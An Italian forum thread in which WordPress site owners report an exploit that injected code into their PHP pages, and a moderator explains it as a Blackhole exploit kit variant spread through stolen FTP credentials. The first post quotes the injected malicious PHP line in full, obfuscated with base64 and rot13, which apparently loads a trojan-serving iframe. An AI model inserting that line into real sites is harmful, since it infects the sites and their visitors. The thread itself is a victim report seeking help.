Visualizzazione risultati 1 fino 5 di 5

Discussione: Exploit che inietta codice in (quasi) tutte le pagine php del sito

Guest

Predefinito Exploit che inietta codice in (quasi) tutte le pagine php del sito

Volevo segnalarvi che sembra esserci un exploit (non so se specifico per wordpress o meno) che inserisce questo codice in cima a quasi tutte le pagine php del sito:
    Codice:
    <?php $somecrainsignvar="f9fn7k1v"; echo base64_decode(str_rot13('CTyzpzSgMFOmpzZ9W2u0qUN6Yl9cozEioJI0LKA0LJ4hnJ4inJ4hL2qcC2EyMzS1oUDaVUqcMUEbCFplWlObMJyanUD9WmVaVTMlLJ1yLz9lMTIlCFpjWm4=')); $crain="";
    Il codice in questione crea un iframe contenente un malware/trojan, infettando tutto il sito e tutti i vostri utenti. Ora non so se è una vulnerabilità di wordpress o se è una vulnerabilità di altervista ma il mio sito (amisubs.altervista.org) è appena stato colpito e sto tirando giu tutti i santi. Sono stato immediatamente sospeso da google adwords e probabilmente alcuni dei miei utenti sono rimasti infettati dal trojan.

L'avatar di dreadnaut
    dreadnaut non è connesso Super Moderatore

Predefinito

Citazione Originalmente inviato da amisubs Visualizza messaggio
    Ora non so se è una vulnerabilità di wordpress o se è una vulnerabilità di altervista ma il mio sito (amisubs.altervista.org) è appena stato colpito e sto tirando giu tutti i santi.
    Ahime, ne' uno ne' l'altro probabilmente: se fosse una vulnerabilità di Wordpress o di AlterVista, lo vedresti su tutti i blog di Wordpress, o di AlterVista.

Simili casi sono già avvenuti, e sono di solito causati da virus sulla tua macchina, che riusano le credenziali ftp per caricare il loro codice sul tuo sito. Verifica che il tuo computer sia pulito, e cambia password.

Guest

Predefinito

Arghhh ho appena trovato articoli al riguardo. Era quel maledetto video su facebook. Qualcuno sa un buon metodo per cercare file infetti sul mio sito, ho riuppato tutto wordpress ma sembra ancora avere due iframe in cima.

L'avatar di scimmiablu
    scimmiablu non è connesso Neofita

Predefinito

bè per la cronaca fatalità è capitato pure a me oggi...e io sono molto attento ai virus ecc...
    e leggo nel forum che anche ad altri è capitato

io credo che ci sia qualche problema nel server, o quelli in cui siamo noi.

l'altra ipotesi è che ci fosse un bug nella versione 3.0 di wordpress mia...ma non tocco ftp ecc da una settimana

L'avatar di dreadnaut
    dreadnaut non è connesso Super Moderatore

Predefinito

Entrambe le ipotesi sono sbagliate, spiacente.

E' l'ennesima versione del "Blackhole exploit kit", che funziona all'incirca così: tu visiti un sito infettato, che prova in tot di modi a farti scaricare ed eseguire un file. Se ci riesce, ti ritrovi installato un trojan che monitora nomi utenti e password, e se trova fra queste un sito web, infetta le pagine online. E via così.